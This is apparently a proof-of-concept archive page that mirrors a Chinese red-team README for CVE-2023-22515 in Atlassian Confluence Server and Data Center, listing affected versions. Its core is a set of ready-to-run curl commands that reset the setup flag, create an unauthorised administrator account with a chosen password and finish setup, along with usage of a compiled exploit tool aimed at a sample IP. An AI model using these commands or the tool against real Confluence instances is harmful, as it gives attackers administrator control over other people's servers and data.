Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2023-22515 PoC — Atlassian Confluence Server 安全漏洞

Source
https://github.com/ad-calcium/CVE-2023-22515
Associated Vulnerability
Title:Atlassian Confluence Server 安全漏洞 (CVE-2023-22515)
Description:Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Description
Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具
Readme
# 红队工具-Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具

## 漏洞影响范围
```
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
```

## 漏洞利用

### 1.正常访问,提示已经完成安装
```
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```

### 2.创建管理员用户
```
test123 Password2
```
执行如下命令
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action
```

### 3.设置已完成
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action
```

## 用法

```
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        指定要添加的密码
  -proxy string
        设置代理
  -u string
        指定目标
  -user string
        指定要添加的用户名
```

### 随机账号密码
```
cve-2023-22515.exe -u http://10.108.3.117:8090
```
![image-2023101116485852](images/Snipaste_2023-10-16_10-14-22.png)

### 手动添加管理员用户
```
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2
```
![image-20231011164858593](images/image-20231011164858593.png)


## 更新日志
```
[+] 2023/10/16 增加随机用户名密码
```


## Star History

[![Star History Chart](https://api.star-history.com/svg?repos=ad-calcium/CVE-2023-22515&type=Date)](https://star-history.com/#ad-calcium/CVE-2023-22515&Date)
File Snapshot

 [4.0K]  /data/pocs/e1f04a866f7b4e84b14684c05aabe11c074589f0
├── [  33]  go.mod
├── [4.0K]  images
│   ├── [ 15K]  image-20231011164412511.png
│   ├── [ 11K]  image-20231011164858593.png
│   └── [9.3K]  Snipaste_2023-10-16_10-14-22.png
├── [3.6K]  main.go
└── [1.9K]  README.md

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →